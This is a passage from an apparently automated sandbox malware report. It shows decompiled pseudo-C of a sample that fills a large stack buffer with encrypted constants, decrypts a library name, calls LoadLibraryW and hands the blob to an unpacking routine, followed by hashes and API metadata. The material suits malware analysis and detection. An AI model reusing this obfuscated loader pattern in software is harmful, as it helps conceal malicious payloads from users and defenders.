                  				intOrPtr _v856;
                  				intOrPtr _v860;
                  				intOrPtr _v864;
                  				intOrPtr _v868;
                  				intOrPtr _v872;
                  				intOrPtr _v876;
                  				intOrPtr _v880;
                  				intOrPtr _v884;
                  				intOrPtr _v888;
                  				intOrPtr _v892;
                  				intOrPtr _v896;
                  				intOrPtr _v900;
                  				intOrPtr _v904;
                  				intOrPtr _v908;
                  				intOrPtr _v912;
                  				intOrPtr _v916;
                  				intOrPtr _v920;
                  				intOrPtr _v924;
                  				intOrPtr _v928;
                  				intOrPtr _v932;
                  				intOrPtr _v936;
                  				intOrPtr _v940;
                  				intOrPtr _v944;
                  				intOrPtr _v948;
                  				intOrPtr _v952;
                  				intOrPtr _v956;
                  				intOrPtr _v960;
                  				intOrPtr _v964;
                  				intOrPtr _v968;
                  				intOrPtr _v972;
                  				intOrPtr _v976;
                  				intOrPtr _v980;
                  				intOrPtr _v984;
                  				intOrPtr _v988;
                  				intOrPtr _v992;
                  				intOrPtr _v996;
                  				intOrPtr _v1000;
                  				intOrPtr _v1004;
                  				intOrPtr _v1008;
                  				intOrPtr _v1012;
                  				intOrPtr _v1016;
                  				intOrPtr _v1020;
                  				intOrPtr _v1024;
                  				intOrPtr _v1028;
                  				intOrPtr _v1032;
                  				intOrPtr _v1036;
                  				intOrPtr _v1040;
                  				intOrPtr _v1044;
                  				intOrPtr _v1048;
                  				intOrPtr _v1052;
                  				intOrPtr _v1056;
                  				intOrPtr _v1060;
                  				intOrPtr _v1064;
                  				intOrPtr _v1068;
                  				intOrPtr _v1072;
                  				intOrPtr _v1076;
                  				intOrPtr _v1080;
                  				intOrPtr _v1084;
                  				intOrPtr _v1088;
                  				intOrPtr _v1092;
                  				intOrPtr _v1096;
                  				intOrPtr _v1100;
                  				intOrPtr _v1104;
                  				intOrPtr _v1108;
                  				intOrPtr _v1112;
                  				intOrPtr _v1116;
                  				intOrPtr _v1120;
                  				intOrPtr _v1124;
                  				intOrPtr _v1128;
                  				intOrPtr _v1132;
                  				intOrPtr _v1136;
                  				intOrPtr _v1140;
                  				intOrPtr _v1144;
                  				intOrPtr _v1148;
                  				intOrPtr _v1152;
                  				intOrPtr _v1156;
                  				intOrPtr _v1160;
                  				intOrPtr _v1164;
                  				intOrPtr _v1168;
                  				intOrPtr _v1172;
                  				intOrPtr _v1176;
                  				intOrPtr _v1180;
                  				intOrPtr _v1184;
                  				intOrPtr _v1188;
                  				intOrPtr _v1192;
                  				intOrPtr _v1196;
                  				intOrPtr _v1200;
                  				intOrPtr _v1204;
                  				intOrPtr _v1208;
                  				intOrPtr _v1212;
                  				intOrPtr _v1216;
                  				intOrPtr _v1220;
                  				intOrPtr _v1224;
                  				intOrPtr _v1228;
                  				intOrPtr _v1232;
                  				intOrPtr _v1236;
                  				intOrPtr _v1240;
                  				intOrPtr _v1244;
                  				intOrPtr _v1248;
                  				intOrPtr _v1252;
                  				intOrPtr _v1256;
                  				intOrPtr _v1260;
                  				intOrPtr _v1264;
                  				intOrPtr _v1268;
                  				intOrPtr _v1272;
                  				intOrPtr _v1276;
                  				intOrPtr _v1280;
                  				intOrPtr _v1284;
                  				intOrPtr _v1288;
                  				intOrPtr _v1292;
                  				intOrPtr _v1296;
                  				intOrPtr _v1300;
                  				intOrPtr _v1304;
                  				intOrPtr _v1308;
                  				intOrPtr _v1312;
                  				intOrPtr _v1316;
                  				intOrPtr _v1320;
                  				intOrPtr _v1324;
                  				intOrPtr _v1328;
                  				intOrPtr _v1332;
                  				intOrPtr _v1336;
                  				intOrPtr _v1340;
                  				intOrPtr _v1344;
                  				intOrPtr _v1348;
                  				intOrPtr _v1352;
                  				intOrPtr _v1356;
                  				intOrPtr _v1360;
                  				intOrPtr _v1364;
                  				intOrPtr _v1368;
                  				intOrPtr _v1372;
                  				intOrPtr _v1376;
                  				intOrPtr _v1380;
                  				intOrPtr _v1384;
                  				intOrPtr _v1388;
                  				intOrPtr _v1392;
                  				intOrPtr _v1396;
                  				intOrPtr _v1400;
                  				intOrPtr _v1404;
                  				intOrPtr _v1408;
                  				intOrPtr _v1412;
                  				intOrPtr _v1416;
                  				intOrPtr _v1420;
                  				intOrPtr _v1424;
                  				intOrPtr _v1428;
                  				intOrPtr _v1432;
                  				intOrPtr _v1436;
                  				intOrPtr _v1440;
                  				intOrPtr _v1444;
                  				intOrPtr _v1448;
                  				intOrPtr _v1452;
                  				intOrPtr _v1456;
                  				intOrPtr _v1460;
                  				intOrPtr _v1464;
                  				intOrPtr _v1468;
                  				intOrPtr _v1472;
                  				intOrPtr _v1476;
                  				intOrPtr _v1480;
                  				intOrPtr _v1484;
                  				intOrPtr _v1488;
                  				intOrPtr _v1492;
                  				intOrPtr _v1496;
                  				intOrPtr _v1500;
                  				intOrPtr _v1504;
                  				intOrPtr _v1508;
                  				intOrPtr _v1512;
                  				intOrPtr _v1516;
                  				intOrPtr _v1520;
                  				intOrPtr _v1524;
                  				intOrPtr _v1528;
                  				intOrPtr _v1532;
                  				intOrPtr _v1536;
                  				intOrPtr _v1540;
                  				intOrPtr _v1544;
                  				intOrPtr _v1548;
                  				intOrPtr _v1552;
                  				intOrPtr _v1556;
                  				intOrPtr _v1560;
                  				intOrPtr _v1564;
                  				intOrPtr _v1568;
                  				intOrPtr _v1572;
                  				intOrPtr _v1576;
                  				intOrPtr _v1580;
                  				intOrPtr _v1584;
                  				intOrPtr _v1588;
                  				intOrPtr _v1592;
                  				intOrPtr _v1596;
                  				intOrPtr _v1600;
                  				intOrPtr _v1604;
                  				intOrPtr _v1608;
                  				intOrPtr _v1612;
                  				intOrPtr _v1616;
                  				intOrPtr _v1620;
                  				intOrPtr _v1624;
                  				intOrPtr _v1628;
                  				intOrPtr _v1632;
                  				intOrPtr _v1636;
                  				intOrPtr _v1640;
                  				intOrPtr _v1644;
                  				intOrPtr _v1648;
                  				intOrPtr _v1652;
                  				intOrPtr _v1656;
                  				intOrPtr _v1660;
                  				intOrPtr _v1664;
                  				intOrPtr _v1668;
                  				intOrPtr _v1672;
                  				intOrPtr _v1676;
                  				intOrPtr _v1680;
                  				intOrPtr _v1684;
                  				intOrPtr _v1688;
                  				intOrPtr _v1692;
                  				intOrPtr _v1696;
                  				intOrPtr _v1700;
                  				intOrPtr _v1704;
                  				intOrPtr _v1708;
                  				intOrPtr _v1712;
                  				intOrPtr _v1716;
                  				intOrPtr _v1720;
                  				intOrPtr _v1724;
                  				intOrPtr _v1728;
                  				intOrPtr _v1732;
                  				intOrPtr _v1736;
                  				intOrPtr _v1740;
                  				intOrPtr _v1744;
                  				intOrPtr _v1748;
                  				intOrPtr _v1752;
                  				intOrPtr _v1756;
                  				intOrPtr _v1760;
                  				intOrPtr _v1764;
                  				intOrPtr _v1768;
                  				intOrPtr _v1772;
                  				intOrPtr _v1776;
                  				intOrPtr _v1780;
                  				intOrPtr _v1784;
                  				intOrPtr _v1788;
                  				intOrPtr _v1792;
                  				intOrPtr _v1796;
                  				intOrPtr _v1800;
                  				intOrPtr _v1804;
                  				intOrPtr _v1808;
                  				intOrPtr _v1812;
                  				intOrPtr _v1816;
                  				intOrPtr _v1820;
                  				intOrPtr _v1824;
                  				intOrPtr _v1828;
                  				intOrPtr _v1832;
                  				intOrPtr _v1836;
                  				intOrPtr _v1840;
                  				intOrPtr _v1844;
                  				intOrPtr _v1848;
                  				intOrPtr _v1852;
                  				intOrPtr _v1856;
                  				intOrPtr _v1860;
                  				intOrPtr _v1864;
                  				intOrPtr _v1868;
                  				intOrPtr _v1872;
                  				intOrPtr _v1876;
                  				intOrPtr _v1880;
                  				intOrPtr _v1884;
                  				intOrPtr _v1888;
                  				intOrPtr _v1892;
                  				intOrPtr _v1896;
                  				intOrPtr _v1900;
                  				intOrPtr _v1904;
                  				intOrPtr _v1908;
                  				intOrPtr _v1912;
                  				intOrPtr _v1916;
                  				intOrPtr _v1920;
                  				intOrPtr _v1924;
                  				intOrPtr _v1928;
                  				intOrPtr _v1932;
                  				intOrPtr _v1936;
                  				intOrPtr _v1940;
                  				intOrPtr _v1944;
                  				intOrPtr _v1948;
                  				intOrPtr _v1952;
                  				intOrPtr _v1956;
                  				intOrPtr _v1960;
                  				intOrPtr _v1964;
                  				intOrPtr _v1968;
                  				intOrPtr _v1972;
                  				intOrPtr _v1976;
                  				intOrPtr _v1980;
                  				intOrPtr _v1984;
                  				intOrPtr _v1988;
                  				intOrPtr _v1992;
                  				intOrPtr _v1996;
                  				intOrPtr _v2000;
                  				intOrPtr _v2004;
                  				intOrPtr _v2008;
                  				intOrPtr _v2012;
                  				char _v2016;
                  				struct HINSTANCE__* _t506;
                  
                  				_v2016 = 0x18cc9019;
                  				_v2012 = 0xfc13bd0b;
                  				_v2008 = 0xd3055123;
                  				_v2004 = 0xfefbe9e2;
                  				_v2000 = 0x33514f2d;
                  				_v1996 = 0x3a9ec3b2;
                  				_v1992 = 0x4e73ef30;
                  				_v1988 = 0x5297271a;
                  				_v1984 = 0x2617a6ff;
                  				_v1980 = 0xd827466e;
                  				_v1976 = 0x7b1d390a;
                  				_v1972 = 0xcd18d019;
                  				_v1968 = 0x21d65d43;
                  				_v1964 = 0x3934b95;
                  				_v1960 = 0xa4200f47;
                  				_v1956 = 0x701eb724;
                  				_v1952 = 0xa10f78fe;
                  				_v1948 = 0xc30a8a91;
                  				_v1944 = 0xafee2c35;
                  				_v1940 = 0x2014674f;
                  				_v1936 = 0x82b976a7;
                  				_v1932 = 0xf8d1ef8c;
                  				_v1928 = 0xaf5f6f2a;
                  				_v1924 = 0x6d7bb63;
                  				_v1920 = 0x2c5506c;
                  				_v1916 = 0x57d61a32;
                  				_v1912 = 0xa54bb9df;
                  				_v1908 = 0x29098018;
                  				_v1904 = 0x9689a1a3;
                  				_v1900 = 0x19d0c8f1;
                  				_v1896 = 0x57673daf;
                  				_v1892 = 0xf2a532af;
                  				_v1888 = 0x240475f7;
                  				_v1884 = 0x46cfe7f3;
                  				_v1880 = 0xad58dce4;
                  				_v1876 = 0x18207d91;
                  				_v1872 = 0x3c1b0996;
                  				_v1868 = 0x813bb415;
                  				_v1864 = 0xf0ad736b;
                  				_v1860 = 0x9a67c68b;
                  				_v1856 = 0xf3b4eed5;
                  				_v1852 = 0x69844a1f;
                  				_v1848 = 0xea145883;
                  				_v1844 = 0x822acb0b;
                  				_v1840 = 0x13884116;
                  				_v1836 = 0xe76b15dc;
                  				_v1832 = 0x26b2f835;
                  				_v1828 = 0x58c0b0a6;
                  				_v1824 = 0x4f99480f;
                  				_v1820 = 0x8317945d;
                  				_v1816 = 0x11186d36;
                  				_v1812 = 0xa36486f9;
                  				_v1808 = 0x592784c3;
                  				_v1804 = 0xb01fe73f;
                  				_v1800 = 0xee7691d5;
                  				_v1796 = 0x3ca59d41;
                  				_v1792 = 0x1ffeb2f4;
                  				_v1788 = 0xe8c4b804;
                  				_v1784 = 0x6a6fa9f2;
                  				_v1780 = 0x52f14fe3;
                  				_v1776 = 0xee467e7e;
                  				_v1772 = 0x1f34eb8;
                  				_v1768 = 0xb5b476c8;
                  				_v1764 = 0x658faff9;
                  				_v1760 = 0x2dad05f2;
                  				_v1756 = 0x9aad0b6e;
                  				_v1752 = 0xe77b8f07;
                  				_v1748 = 0x888beb88;
                  				_v1744 = 0xc35503bc;
                  				_v1740 = 0x4e8b0f48;
                  				_v1736 = 0xce740bb1;
                  				_v1732 = 0xc39d368e;
                  				_v1728 = 0x1b88bdf7;
                  				_v1724 = 0x23e57627;
                  				_v1720 = 0xb4788768;
                  				_v1716 = 0xf19eaf6c;
                  				_v1712 = 0xdbe1454f;
                  				_v1708 = 0xc871bcfc;
                  				_v1704 = 0x127e5dbe;
                  				_v1700 = 0xfe3e9d14;
                  				_v1696 = 0x22f72f43;
                  				_v1692 = 0x4312baa6;
                  				_v1688 = 0xad4a5ecb;
                  				_v1684 = 0xa028fea5;
                  				_v1680 = 0x761b3243;
                  				_v1676 = 0x34966a1c;
                  				_v1672 = 0xf6973c49;
                  				_v1668 = 0x8a40440c;
                  				_v1664 = 0xee39029a;
                  				_v1660 = 0x7c1e4236;
                  				_v1656 = 0x143df846;
                  				_v1652 = 0x9de53ad0;
                  				_v1648 = 0xc8beea01;
                  				_v1644 = 0x29cc1c2d;
                  				_v1640 = 0x7f4431a8;
                  				_v1636 = 0xfec5cc0;
                  				_v1632 = 0x6ee37ac8;
                  				_v1628 = 0xacbebd8b;
                  				_v1624 = 0xbb86f15c;
                  				_v1620 = 0xb7b48568;
                  				_v1616 = 0x29e47454;
                  				_v1612 = 0xf3a9637c;
                  				_v1608 = 0x8f079d8a;
                  				_v1604 = 0xd6149023;
                  				_v1600 = 0x907d15f8;
                  				_v1596 = 0xeab026f;
                  				_v1592 = 0x9e6a4e4b;
                  				_v1588 = 0x4a44c5d3;
                  				_v1584 = 0xd22928bb;
                  				_v1580 = 0xb1fd329a;
                  				_v1576 = 0x1c1576c0;
                  				_v1572 = 0xa4a73685;
                  				_v1568 = 0x36cd5ba3;
                  				_v1564 = 0x1a36c10b;
                  				_v1560 = 0xb0c67415;
                  				_v1556 = 0x4aaaa7c8;
                  				_v1552 = 0xcd5df8dd;
                  				_v1548 = 0x510f2661;
                  				_v1544 = 0x356fdb71;
                  				_v1540 = 0x42269525;
                  				_v1536 = 0x86b8d3a8;
                  				_v1532 = 0xb6e8fd01;
                  				_v1528 = 0x3e8b6d07;
                  				_v1524 = 0x72fbbb5d;
                  				_v1520 = 0xe78325fb;
                  				_v1516 = 0xad00bbae;
                  				_v1512 = 0x81d6f54d;
                  				_v1508 = 0xc51298d;
                  				_v1504 = 0x694576a;
                  				_v1500 = 0x7b073001;
                  				_v1496 = 0xac7097a8;
                  				_v1492 = 0x9ae8794d;
                  				_v1488 = 0xdcb3999d;
                  				_v1484 = 0x39910103;
                  				_v1480 = 0x272c8a0d;
                  				_v1476 = 0xd994c963;
                  				_v1472 = 0xb8caa410;
                  				_v1468 = 0x77ea86db;
                  				_v1464 = 0x4f48a441;
                  				_v1460 = 0xedf95ffe;
                  				_v1456 = 0xe35319f5;
                  				_v1452 = 0x8e7481a9;
                  				_v1448 = 0xc0fdafea;
                  				_v1444 = 0xf2265a47;
                  				_v1440 = 0xcf7bb0c5;
                  				_v1436 = 0xf2c353b8;
                  				_v1432 = 0xafbe8713;
                  				_v1428 = 0xa9402955;
                  				_v1424 = 0xae9ed42e;
                  				_v1420 = 0xba8bce00;
                  				_v1416 = 0x2b54a3db;
                  				_v1412 = 0xccf05ebe;
                  				_v1408 = 0xa076ed6b;
                  				_v1404 = 0xcf4d37ba;
                  				_v1400 = 0xd04ca788;
                  				_v1396 = 0x9a366f18;
                  				_v1392 = 0xfc43d964;
                  				_v1388 = 0x740c132a;
                  				_v1384 = 0x7af9ab75;
                  				_v1380 = 0xfe58605f;
                  				_v1376 = 0x45284ada;
                  				_v1372 = 0xdd33943a;
                  				_v1368 = 0x9603722e;
                  				_v1364 = 0x5e202100;
                  				_v1360 = 0x211ec50a;
                  				_v1356 = 0x5e71f48b;
                  				_v1352 = 0x4556bd52;
                  				_v1348 = 0xd305c05b;
                  				_v1344 = 0xe1d91e4;
                  				_v1340 = 0x83541fc2;
                  				_v1336 = 0xcd16994e;
                  				_v1332 = 0x21346b36;
                  				_v1328 = 0x1d77397;
                  				_v1324 = 0x8f9dc5c5;
                  				_v1320 = 0x94434bc3;
                  				_v1316 = 0xf3ce98cc;
                  				_v1312 = 0x5c4aa2fe;
                  				_v1308 = 0xe951eeea;
                  				_v1304 = 0xfd5d5f15;
                  				_v1300 = 0x3cd5a5e6;
                  				_v1296 = 0x61448c10;
                  				_v1292 = 0x86fb9609;
                  				_v1288 = 0xff5281d4;
                  				_v1284 = 0xb85560b1;
                  				_v1280 = 0x4e769b9e;
                  				_v1276 = 0x9c9e9d9a;
                  				_v1272 = 0x5b283c55;
                  				_v1268 = 0xc8b47d7a;
                  				_v1264 = 0x5a493c87;
                  				_v1260 = 0xfad664f9;
                  				_v1256 = 0x5abc71e;
                  				_v1252 = 0x209be785;
                  				_v1248 = 0x98eee0b9;
                  				_v1244 = 0xf45c44cb;
                  				_v1240 = 0xfc890003;
                  				_v1236 = 0xdde376df;
                  				_v1232 = 0x99b519eb;
                  				_v1228 = 0x2f9820c6;
                  				_v1224 = 0xbfd2c76a;
                  				_v1220 = 0x368331be;
                  				_v1216 = 0x34cb7262;
                  				_v1212 = 0x9e286886;
                  				_v1208 = 0xf8033aee;
                  				_v1204 = 0xa641fe10;
                  				_v1200 = 0xb35d5dc1;
                  				_v1196 = 0x4168b366;
                  				_v1192 = 0x879c2bd9;
                  				_v1188 = 0x384ba925;
                  				_v1184 = 0xc19e2084;
                  				_v1180 = 0xc64af4d;
                  				_v1176 = 0x7edca4f4;
                  				_v1172 = 0x9d0c78e7;
                  				_v1168 = 0xa0a5e6d;
                  				_v1164 = 0x10af2866;
                  				_v1160 = 0x9ecf2009;
                  				_v1156 = 0x72e04854;
                  				_v1152 = 0x2d3f4b90;
                  				_v1148 = 0x6090f65;
                  				_v1144 = 0xfa1a3e58;
                  				_v1140 = 0xc7a398be;
                  				_v1136 = 0x7246d83c;
                  				_v1132 = 0x567337f;
                  				_v1128 = 0x39b2583b;
                  				_v1124 = 0xc72a706f;
                  				_v1120 = 0x6f73f905;
                  				_v1116 = 0xad40a50d;
                  				_v1112 = 0x600b404a;
                  				_v1108 = 0x46bbfc74;
                  				_v1104 = 0x1d99e1d9;
                  				_v1100 = 0xf52f3d4f;
                  				_v1096 = 0xf3a9291a;
                  				_v1092 = 0xd83e3d46;
                  				_v1088 = 0x1bf9c7de;
                  				_v1084 = 0xec5f8222;
                  				_v1080 = 0xa64ad53d;
                  				_v1076 = 0x1b00aac3;
                  				_v1072 = 0x5cc80cd4;
                  				_v1068 = 0x23d0ae6a;
                  				_v1064 = 0x9f8356c1;
                  				_v1060 = 0x2cc01cd2;
                  				_v1056 = 0x6b49265;
                  				_v1052 = 0x88a81c59;
                  				_v1048 = 0x36abd356;
                  				_v1044 = 0xa16f51f3;
                  				_v1040 = 0x48f7e779;
                  				_v1036 = 0xd7e3e6d5;
                  				_v1032 = 0x328ad21a;
                  				_v1028 = 0xe1bae1bc;
                  				_v1024 = 0x8857e101;
                  				_v1020 = 0x876ae51f;
                  				_v1016 = 0x87756620;
                  				_v1012 = 0x8eef0fa6;
                  				_v1008 = 0x184ae7f0;
                  				_v1004 = 0xbf30c42d;
                  				_v1000 = 0x40f47861;
                  				_v996 = 0x3a38bcad;
                  				_v992 = 0x1943786e;
                  				_v988 = 0xbb65064b;
                  				_v984 = 0x397aa2c3;
                  				_v980 = 0xc866c4b9;
                  				_v976 = 0xf9379a4e;
                  				_v972 = 0xfef938c3;
                  				_v968 = 0x31bef2e7;
                  				_v964 = 0x38dc8fa2;
                  				_v960 = 0x17200b94;
                  				_v956 = 0xf3234397;
                  				_v952 = 0xce6a264e;
                  				_v948 = 0xed9f43ef;
                  				_v944 = 0x396ff646;
                  				_v940 = 0xfc401490;
                  				_v936 = 0xe8cf621c;
                  				_v932 = 0x9703fa40;
                  				_v928 = 0xad75de4e;
                  				_v924 = 0x4ccf3491;
                  				_v920 = 0xbd007eb2;
                  				_v916 = 0xe40c23c1;
                  				_v912 = 0x801c9ffb;
                  				_v908 = 0x44b47ea6;
                  				_v904 = 0xe4e16921;
                  				_v900 = 0x3019b644;
                  				_v896 = 0x4211747d;
                  				_v892 = 0xc5c07612;
                  				_v888 = 0xe0c8cd28;
                  				_v884 = 0xdb7a8454;
                  				_v880 = 0xeddd87d7;
                  				_v876 = 0x84e2a523;
                  				_v872 = 0xb1a72cee;
                  				_v868 = 0x35fd5e1e;
                  				_v864 = 0x77c1300;
                  				_v860 = 0x44e19c63;
                  				_v856 = 0xcd26a443;
                  				_v852 = 0x6a20bf6d;
                  				_v848 = 0x95cb5336;
                  				_v844 = 0xbb9f097e;
                  				_v840 = 0x16874c91;
                  				_v836 = 0xf504549c;
                  				_v832 = 0x393d32e8;
                  				_v828 = 0x31216bbc;
                  				_v824 = 0x21260832;
                  				_v820 = 0x66ce8284;
                  				_v816 = 0x3d06524e;
                  				_v812 = 0x849b5286;
                  				_v808 = 0xb423b433;
                  				_v804 = 0x82362b32;
                  				_v800 = 0xa5e21bc7;
                  				_v796 = 0xa42133c9;
                  				_v792 = 0xeb7b9cac;
                  				_v788 = 0xe6375659;
                  				_v784 = 0x1035672d;
                  				_v780 = 0xf3745f93;
                  				_v776 = 0xb4435473;
                  				_v772 = 0x1c869446;
                  				_v768 = 0x62fa226;
                  				_v764 = 0x9d47888e;
                  				_v760 = 0x7cb63c6d;
                  				_v756 = 0x22bdfa65;
                  				_v752 = 0x93d8172c;
                  				_v748 = 0x133b2f6b;
                  				_v744 = 0xd91484c1;
                  				_v740 = 0x39138faf;
                  				_v736 = 0x820ffbcf;
                  				_v732 = 0xb0fcdc78;
                  				_v728 = 0x137ac19e;
                  				_v724 = 0xe6036613;
                  				_v720 = 0x1a089bd1;
                  				_v716 = 0x26b8ba50;
                  				_v712 = 0x869fa0d6;
                  				_v708 = 0xbc873eec;
                  				_v704 = 0xc87e3136;
                  				_v700 = 0x4511ee89;
                  				_v696 = 0xa7415ad9;
                  				_v692 = 0x7d3bd1d;
                  				_v688 = 0xb0eb0c53;
                  				_v684 = 0xd7a6619e;
                  				_v680 = 0x78bfa5e6;
                  				_v676 = 0x4089e27b;
                  				_v672 = 0xa1bc213c;
                  				_v668 = 0x16673548;
                  				_v664 = 0x8173ea10;
                  				_v660 = 0xd6d298a6;
                  				_v656 = 0x5ccde102;
                  				_v652 = 0xc73114dc;
                  				_v648 = 0x4f274da2;
                  				_v644 = 0x43a9f7a3;
                  				_v640 = 0xa5bd1e32;
                  				_v636 = 0xa6c08dc1;
                  				_v632 = 0x5d59af79;
                  				_v628 = 0xb79d6c3d;
                  				_v624 = 0x7b95f209;
                  				_v620 = 0x339d4f03;
                  				_v616 = 0xe55c9dda;
                  				_v612 = 0x1d4e12d0;
                  				_v608 = 0x14fb9e12;
                  				_v604 = 0xc04af32b;
                  				_v600 = 0x5398148c;
                  				_v596 = 0xc1b8b7e0;
                  				_v592 = 0x5a046973;
                  				_v588 = 0x8aab4584;
                  				_v584 = 0xa316cf3;
                  				_v580 = 0x8392c969;
                  				_v576 = 0x66d37a42;
                  				_v572 = 0xa39a43d0;
                  				_v568 = 0x72e43df5;
                  				_v564 = 0x7def3a5b;
                  				_v560 = 0xa3e032db;
                  				_v556 = 0xbaae509a;
                  				_v552 = 0x725465ba;
                  				_v548 = 0x180c7d81;
                  				_v544 = 0x811b17e0;
                  				_v540 = 0x74704b5e;
                  				_v536 = 0x22f47ff4;
                  				_v532 = 0xcc6df209;
                  				_v528 = 0x38770f86;
                  				_v524 = 0x4016937a;
                  				_v520 = 0x62212e95;
                  				_v516 = 0x3aecdd;
                  				_v512 = 0x9a86b823;
                  				_v508 = 0xe493bd28;
                  				_v504 = 0x94dafcea;
                  				_v500 = 0x6e43dbbe;
                  				_v496 = 0x11a6291f;
                  				_v492 = 0x68d91615;
                  				_v488 = 0x4076d820;
                  				_v484 = 0xa757a1c7;
                  				_v480 = 0xadc5eff9;
                  				_v476 = 0x1d06787c;
                  				_v472 = 0x48121116;
                  				_v468 = 0xb8042b02;
                  				_v464 = 0xa2423491;
                  				_v460 = 0xd20d9bf7;
                  				_v456 = 0x33d51d03;
                  				_v452 = 0x632db46e;
                  				_v448 = 0x8fce7afe;
                  				_v444 = 0x88271008;
                  				_v440 = 0xefddbe88;
                  				_v436 = 0x24ae9a32;
                  				_v432 = 0x7bf42295;
                  				_v428 = 0x268ba065;
                  				_v424 = 0x124f44dd;
                  				_v420 = 0xba93dab;
                  				_v416 = 0xe06e84b0;
                  				_v412 = 0x8d9ef9eb;
                  				_v408 = 0xa4caef6b;
                  				_v404 = 0xb8f2d0d2;
                  				_v400 = 0x4eef8287;
                  				_v396 = 0x44d6faca;
                  				_v392 = 0xb021dd39;
                  				_v388 = 0x65728ae9;
                  				_v384 = 0x4ac666ee;
                  				_v380 = 0xe2d55fa6;
                  				_v376 = 0xd488f647;
                  				_v372 = 0x377d26a2;
                  				_v368 = 0xb1c3322c;
                  				_v364 = 0xbbb1dfd9;
                  				_v360 = 0x7ef9d65d;
                  				_v356 = 0xd69df707;
                  				_v352 = 0xc8a80235;
                  				_v348 = 0x7ede6d98;
                  				_v344 = 0x5a57d2a2;
                  				_v340 = 0x40af756f;
                  				_v336 = 0x2944fdef;
                  				_v332 = 0x3447d376;
                  				_v328 = 0x7ddf0dbd;
                  				_v324 = 0x8c688b53;
                  				_v320 = 0xdede8f54;
                  				_v316 = 0x1855f41e;
                  				_v312 = 0xfa3bc857;
                  				_v308 = 0x1cc619e7;
                  				_v304 = 0x78f4cf52;
                  				_v300 = 0x99b717b5;
                  				_v296 = 0x350e7f98;
                  				_v292 = 0x6bebc19;
                  				_v288 = 0x26729ca6;
                  				_v284 = 0x85259ee2;
                  				_v280 = 0x4ff5a8b1;
                  				_v276 = 0x761762f3;
                  				_v272 = 0xe2377b6c;
                  				_v268 = 0xf606ea17;
                  				_v264 = 0x732cd514;
                  				_v260 = 0x95d9d9f6;
                  				_v256 = 0x4e1a0c62;
                  				_v252 = 0x2f571a4a;
                  				_v248 = 0xde7ffc35;
                  				_v244 = 0xc1baae08;
                  				_v240 = 0x330c550e;
                  				_v236 = 0xe51e9d38;
                  				_v232 = 0x5c7bafc;
                  				_v228 = 0xfede311;
                  				_v224 = 0x7bb4b589;
                  				_v220 = 0x49de023d;
                  				_v216 = 0x5746334b;
                  				_v212 = 0x47c5668e;
                  				_v208 = 0x20d356d6;
                  				_v204 = 0x468884d9;
                  				_v200 = 0xf1a3088;
                  				_v196 = 0x299cca75;
                  				_v192 = 0x7e0aef8c;
                  				_v188 = 0x36e551d0;
                  				_v184 = 0x48145815;
                  				_v180 = 0x79d6fd9e;
                  				_v176 = 0xcb924866;
                  				_v172 = 0x8efb6fa1;
                  				_v168 = 0xb926985e;
                  				_v164 = 0xa196ac7b;
                  				_v160 = 0xaeab18d4;
                  				_v156 = 0x78015c1f;
                  				_v152 = 0x5819869;
                  				_v148 = 0xcca218d0;
                  				_v144 = 0x7d06249f;
                  				_v140 = 0xf0a7edaa;
                  				_v136 = 0x6a004c;
                  				_v132 = 0xf9b9513f;
                  				_v128 = 0x741d919f;
                  				_v124 = 0x2ea3bc66;
                  				_v120 = 0xab1dc78a;
                  				_v116 = 0x74b6dbaa;
                  				_v112 = 0x7e81bfa1;
                  				_v108 = 0x4202d69c;
                  				_v104 = 0x38ce33a7;
                  				_v100 = 0x595e8000;
                  				_v96 = 0x290b2103;
                  				_v92 = 0xe4e40622;
                  				_v88 = 0xc8dd8e6f;
                  				_v84 = 0x4979097d;
                  				_v80 = 0xfee0d431;
                  				_v76 = 0xb9ce1ec8;
                  				_v72 = 0x67261b7e;
                  				_v68 = 0x4ae4b37a;
                  				_v64 = 0xf9871833;
                  				_v60 = 0x68a06f47;
                  				_v56 = 0xd195cac2;
                  				_v52 = 0x5f95137e;
                  				_v48 = 0xfcdb6acb;
                  				_v44 = 0x816238c4;
                  				_v40 = 0xafd25fa6;
                  				_v36 = 0xc5ef91f0;
                  				_v32 = 0x9fbd261a;
                  				_v28 = 0xfa1b3f6e;
                  				_v24 = 0x31581501;
                  				_v20 = 0x54d81d91;
                  				_v16 = 0xbe2861d0;
                  				_v12 = 0xb3163952;
                  				_v8 = 0x10e6581a;
                  				_t514 = E00401A52(0x4127b0, 0x72fc3a35);
                  				_t506 = LoadLibraryW(_t505); // executed
                  				 *0x4164e8 = _t506;
                  				L00401B09(_t514);
                  				_push(0x412e80);
                  				_push(0x2bf385b5);
                  				return E004012FF( *0x4164e8,  &_v2016, 0x1f7);
                  			}

                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 0040768C
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: !i$'v#$-OQ3$0sN$6k4!$K3FW$L$THr$Tt)$U<([$YV7$[:}$^Kpt$l{7$m^$}yI$~~F$2=9$Q
                  • API String ID: 1029625771-1009886285
                  • Opcode ID: e035405825f2c6f0528038317cbdc484b85bd039236133c0542503d7ebbb99e0
                  • Instruction ID: 8b68394b666451bb9afb97b728dfcd24b1eb0b6c41965aaa66b61d789d097ed1
                  • Opcode Fuzzy Hash: e035405825f2c6f0528038317cbdc484b85bd039236133c0542503d7ebbb99e0
                  • Instruction Fuzzy Hash: 6992A5B0C4A7698FDBA18F429E8478DBA75FB41304F5086C8C25D3B215CB761AD2CF89
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 83%
                  			E00408CD5(void* __eflags) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				intOrPtr _v20;
                  				intOrPtr _v24;
                  				intOrPtr _v28;
                  				intOrPtr _v32;
                  				intOrPtr _v36;
                  				intOrPtr _v40;
                  				intOrPtr _v44;
                  				intOrPtr _v48;
                  				intOrPtr _v52;
                  				intOrPtr _v56;
                  				intOrPtr _v60;
                  				intOrPtr _v64;
                  				intOrPtr _v68;
                  				intOrPtr _v72;
                  				intOrPtr _v76;
                  				intOrPtr _v80;
                  				intOrPtr _v84;
                  				intOrPtr _v88;
                  				intOrPtr _v92;
                  				intOrPtr _v96;
                  				intOrPtr _v100;
                  				intOrPtr _v104;
                  				intOrPtr _v108;
